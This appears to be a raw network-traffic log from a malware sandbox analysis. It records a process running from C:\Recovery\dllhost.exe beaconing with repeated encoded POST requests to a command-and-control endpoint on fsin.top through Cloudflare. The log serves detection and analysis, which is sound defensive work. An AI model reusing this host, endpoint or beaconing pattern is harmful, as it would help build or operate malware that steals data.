                                                  Data Ascii: 554VJ}Yo}cIxrw[|xZ}Y`P~sbUn]|}Ls]cpbPn_av_dj[xUKqOtLwhr}hwiSlXZ|pv\qcbjZrv|^}tdZuL{|\y~NrY{w`MlY|LxSp[m\Y[lc}[^txt|j[saapzQA[kdwP|afRw|RAzoc\w`uRmaS~Rq[la}ZaM^Za_[cbnP~]ztrn_vflk|fXwo|~`|xoclvDkmkQwIl~bqP~SlQxCfNry{]FQksP~ct@~dy]lmZX{gX|_{~wsNSB{ctL~bpwseQ{\yuH`E}v|}XSvrsbyBgbxXh~]cubuvqaajI|p~YQJuqczriI}NyKxYZxg|ym{z\xzcTO|NxD{wlD~\gvO^}Bs}gd@OaNvBR{l`w`vNyauJ||~xqTuc{IuqpwabA~pjvryu[ZA~latlt~s|xRwKxNzI}mRCtg`O~b\B}Co{Sv~Ly}pp|RZ``~IfxCUJx\|qQI|gw|pu@y]^M~b|tc[A{aWIuHd~fpO~vmwLw}bi|If{vpB~cUuLqtq}H|O~~ll}wUu_{zbq}pS{Ilyg`{SgyblHxMfA{]NZodsXjLwMwb|~
                                                  Aug 1, 2024 07:37:25.988744020 CEST718INData Raw: 52 6f 07 68 59 55 55 7f 71 61 0b 77 7c 52 4e 78 6f 68 03 60 59 62 08 7b 61 7e 5a 69 7f 62 5f 7a 5c 79 05 76 7f 78 42 61 07 67 78 5b 4c 7e 4a 78 5e 58 06 74 5c 79 01 77 65 55 50 7e 6f 7d 42 76 7f 70 07 7f 63 6f 58 79 6c 74 58 6c 4e 62 4a 7f 43 5a
                                                  Data Ascii: RohYUUqaw|RNxoh`Yb{a~Zib_z\yvxBagx[L~Jx^Xt\yweUP~o}BvpcoXyltXlNbJCZNwt`~bTzSYQQ~Ginj_QAS`{SYg@WdaNQq|_UXk]RXQ{dHcsfUmooFTsgX]\Mnr[cKjekZQeuQuuxYhqak^z@yvRi`|[vaj\vqqhb}XiBcSiggbaQouqVMr]ldCT{o[WnWT[cIQ`aLVwp
                                                  Aug 1, 2024 07:37:26.044601917 CEST249OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 384
                                                  Expect: 100-continue
                                                  Aug 1, 2024 07:37:26.291244984 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:26.291542053 CEST384OUTData Raw: 54 55 58 52 5a 5a 58 54 5c 5e 5a 51 54 5e 57 5a 57 5e 5e 5e 56 59 51 5d 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TUXRZZXT\^ZQT^WZW^^^VYQ][]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!'&6=4X&%0(;">:1 2%7,;6;+X25&G#.X!
                                                  Aug 1, 2024 07:37:26.533801079 CEST729INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:26 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=romHFf3c7xH9pDB9iujj3ElhGtEC%2Brco1Kpiw3bGptODmG0PP9HJqHpJlHFmx4EikmAg0TfbFo3Gd5U3IJQtdECJepZN7CklwKBnfw6IDwmKk5Da3pAzUMjH3Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac379ea19c843cb-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 39 38 0d 0a 02 1f 22 57 27 5e 25 0d 21 2a 0e 53 3e 54 29 50 3e 20 27 04 3f 29 34 04 25 2f 2a 03 26 3b 23 0c 22 3c 3a 01 33 01 2d 08 26 1c 3e 13 3d 37 21 51 04 11 26 5e 37 1d 08 5d 3e 2a 2c 04 25 28 09 13 34 08 27 00 26 33 2e 0f 20 29 3c 16 3d 31 22 02 29 31 2f 54 2d 3b 37 17 28 0d 0a 1f 31 36 2a 56 0d 17 21 09 2e 38 38 55 24 31 23 0e 37 05 20 0e 37 5d 3d 1e 28 3c 2e 58 29 34 2e 1d 2e 55 34 00 3e 0a 3e 50 28 3d 3d 58 3f 04 39 53 30 13 22 5d 2c 03 2d 48 0e 3d 59 4d 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 98"W'^%!*S>T)P> '?)4%/*&;#"<:3-&>=7!Q&^7]>*,%(4'&3. )<=1")1/T-;7(16*V!.88U$1#7 7]=(<.X)4..U4>>P(==X?9S0"],-H=YM0
                                                  Aug 1, 2024 07:37:26.564757109 CEST250OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1284
                                                  Expect: 100-continue
                                                  Aug 1, 2024 07:37:26.664752007 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:26.665117979 CEST1284OUTData Raw: 54 55 58 54 5a 5d 58 53 5c 5e 5a 51 54 54 57 56 57 50 5e 56 56 54 51 5e 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TUXTZ]XS\^ZQTTWVWP^VVTQ^[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"Y$!!5=4[$<8!*5&8%10#8=3\"+ %&G#.X!,
                                                  Aug 1, 2024 07:37:26.912446022 CEST735INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:26 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oFqRvbznOHnzyPUCGHSNTwAEC%2BPheoWMj2V11%2Fg4APbu9H807w77f%2FtV4e1o3pjSJKt8WgI8QUBh9H2O5%2B8dPVXnyBCxWovWrkNgGQgPcUEAEcDfF8JChWHyDA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac379ed5c4e43cb-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 39 38 0d 0a 02 1f 22 1d 27 28 22 55 21 14 02 19 28 21 3d 19 2b 23 2b 07 3f 07 37 5e 26 3f 29 12 31 38 01 0a 35 2f 25 13 33 2f 0b 08 25 0b 2a 5e 29 27 21 51 04 11 26 5f 20 33 0f 04 2b 29 23 58 24 2b 3c 07 37 08 0d 00 30 55 29 51 20 39 24 1b 3d 21 29 59 3f 1c 24 0c 2f 2b 23 15 2b 1d 2b 03 32 26 2a 56 0d 17 22 55 2d 38 1d 0e 27 0c 20 54 23 3c 3b 56 20 05 25 5d 2a 59 3d 04 3d 1d 25 06 39 33 3b 5e 3d 30 2d 08 3c 03 03 1d 28 5c 3e 0b 33 03 22 5d 2c 03 2d 48 0e 3d 59 4d 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 98"'("U!(!=+#+?7^&?)185/%3/%*^)'!Q&_ 3+)#X$+<70U)Q 9$=!)Y?$/+#++2&*V"U-8' T#<;V %]*Y==%93;^=0-<(\>3"],-H=YM0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.449733172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:37:26.316231012 CEST250OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Aug 1, 2024 07:37:26.662242889 CEST1012OUTData Raw: 51 50 5d 55 5f 59 58 51 5c 5e 5a 51 54 55 57 54 57 51 5e 58 56 5c 51 5a 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QP]U_YXQ\^ZQTUWTWQ^XV\QZ[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"0["-;$&#X+;>5>X&'<>$#(,;Y68?]&&G#.X!(
                                                  Aug 1, 2024 07:37:26.770591021 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:27.024939060 CEST594INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:26 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E176D%2BzDoz2egYZ2EOLAEk%2B2Nkc6TSd47kdTPwjYQJ6AATvO2i8P7BryG%2F%2Fw7vYEjr7%2FCDMLQH0B%2FPcHSqNDwcfIlXxF3OT5LZr0BxB%2FXXOf%2BnDras63Pj6hGg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac379ee0c010f74-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.449736172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:37:27.196754932 CEST250OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  3192.168.2.449737172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:37:27.402259111 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:37:27.755934000 CEST1012OUTData Raw: 51 54 5d 52 5f 5a 5d 51 5c 5e 5a 51 54 5e 57 51 57 5e 5e 5a 56 59 51 58 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QT]R_Z]Q\^ZQT^WQW^^ZVYQX[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"Y32"">8$'](8)*5*^%8,'/!& 0;#X"(^2%&G#.X!
                                                  Aug 1, 2024 07:37:27.855858088 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:28.094624043 CEST588INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:28 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5Wc11c1qn031PnlWoReoS%2FBfx4qcoAsvbOUo4QHWq4tNTqDe6CDBRWyHgXk3mi9%2FUIjWko%2BVrLyR%2Fni319EKmc4MENoceB7poYqQtQbSGQNGKX86%2BKwsGgqAwg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac379f4cad74411-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  4192.168.2.449738172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:37:28.284131050 CEST250OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Aug 1, 2024 07:37:28.630892992 CEST1012OUTData Raw: 54 56 5d 57 5a 5e 5d 56 5c 5e 5a 51 54 54 57 57 57 57 5e 58 56 58 51 5c 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TV]WZ^]V\^ZQTTWWWW^XVXQ\[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"_'T*5($5?(R*%X%^#%=&3$W-./\5;8'5&G#.X!,
                                                  Aug 1, 2024 07:37:28.729237080 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:28.946094990 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:28.982858896 CEST582INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:28 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WOUpTIMu9yJN%2BisnZ16NQo0royfxc96B2ni0uJzQeQJrr7u31jWN6kHrrOy0kiIQQWfGpIU9YcVEU5ZlMLxh%2BkGepaK3TppX8vjIjmqxAHaTwe1T4E24sIWawA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac379fa4c2642d3-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  5192.168.2.449740172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:37:29.135257959 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1008
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:37:29.490343094 CEST1008OUTData Raw: 51 57 58 5c 5a 5b 58 5c 5c 5e 5a 51 54 56 57 5a 57 54 5e 5b 56 5e 51 59 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QWX\Z[X\\^ZQTVWZWT^[V^QY[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!0")]"$Y0,?T=92(;&Y*203/.<"#&&G#.X!
                                                  Aug 1, 2024 07:37:29.601708889 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:29.894970894 CEST582INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:29 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CcUPC0e5oay9hjyuUluHunEL1jdu4VMmV34GR7tWNm99GN5ltYkRrDrGAM%2FI6VE4phOKShMxzJ0hTU2mNNI8ZtbhTjnv7tbGz4Rq7rFUPSUJ%2FPx6dDuFdv5TYw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac379ffb8277cf3-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  6192.168.2.449742172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:37:30.154596090 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:37:30.505877018 CEST1012OUTData Raw: 54 52 5d 52 5a 59 5d 51 5c 5e 5a 51 54 5f 57 5b 57 5f 5e 5d 56 54 51 55 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TR]RZY]Q\^ZQT_W[W_^]VTQU[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!'66=,$S3?82W?%1;$%/&^2U W/X?!8(%%&G#.X!
                                                  Aug 1, 2024 07:37:30.608850002 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:30.858093023 CEST582INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:30 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fzl0AniU5CwClymhZMrfcDz6mV10L0czDzz7RkjE5GC0bPEHkp7O2QGtOFNyps6R7dAKoghmMjDnVVC88kkOx99PGsinUReLvXvBb5ieL%2FAU2ZWKvne8Bv3SMg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37a060a805e6c-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  7192.168.2.449743172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:37:31.003865004 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:37:31.349776983 CEST1012OUTData Raw: 51 55 58 5c 5a 5a 5d 53 5c 5e 5a 51 54 50 57 51 57 5e 5e 56 56 5d 51 5e 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QUX\ZZ]S\^ZQTPWQW^^VV]Q^[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"[319["<'6#^((*R='8/R2?1%(-.5;+^%5&G#.X!<
                                                  Aug 1, 2024 07:37:31.448272943 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:31.726249933 CEST584INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:31 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Uoz%2FKyGNCKpNhVkZgNA76%2F7tEUb0LKYqS7L5HM2LLjpNmKVTueJi%2FuTT1q9eVHUW21LInmmppKmvezg3weMIiZQyQ1tioV0RDU5A9CInbva00ftctE9aYfhduQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37a0b4f3841de-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  8192.168.2.449744172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:37:31.860893965 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1000
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  9192.168.2.449745172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:37:31.934628963 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1264
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:37:32.365102053 CEST1264OUTData Raw: 54 54 5d 55 5a 5c 58 50 5c 5e 5a 51 54 53 57 51 57 5f 5e 5a 56 5e 51 5e 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TT]UZ\XP\^ZQTSWQW_^ZV^Q^[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"Y%1:"#$)8**&!&;<%% 7--/X!(+^'5&G#.X!0
                                                  Aug 1, 2024 07:37:32.398417950 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:32.768405914 CEST731INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:32 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=toaK8iD67TBxfQ9SjjQSJUIWweuZLD95bwrY61fUU9GNhFq5dJ%2BR9U6N1gBTCm%2FyEoK7VRUuz45k11iQjXWSfXrVi3xHLI9HpSgsE4k4nwYkVThd78JvgRJVmA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37a112e5ac461-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 39 38 0d 0a 02 1f 21 09 24 28 3e 1c 36 5c 3b 0a 29 0c 0c 0f 3d 55 20 5e 2a 29 3b 5f 25 02 0f 5b 25 16 0e 55 35 3f 22 04 26 3f 26 55 27 21 35 06 3e 37 21 51 04 11 26 5b 34 0d 00 15 2a 07 33 11 30 28 0d 12 37 26 24 59 26 33 25 1d 20 2a 23 07 29 1c 1b 59 2b 31 2f 1f 2e 2b 05 5d 2a 23 27 05 25 1c 2a 56 0d 17 22 56 2d 38 3f 08 30 1c 2f 08 34 3f 37 54 23 15 32 04 2a 3f 2d 03 3e 24 3e 10 2e 23 0d 1c 29 55 2e 56 2b 04 26 07 2b 2a 0b 54 26 29 22 5d 2c 03 2d 48 0e 3d 59 4d 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 98!$(>6\;)=U ^*);_%[%U5?"&?&U'!5>7!Q&[4*30(7&$Y&3% *#)Y+1/.+]*#'%*V"V-8?0/4?7T#2*?->$>.#)U.V+&+*T&)"],-H=YM0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  10192.168.2.449746172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:37:32.063025951 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1008
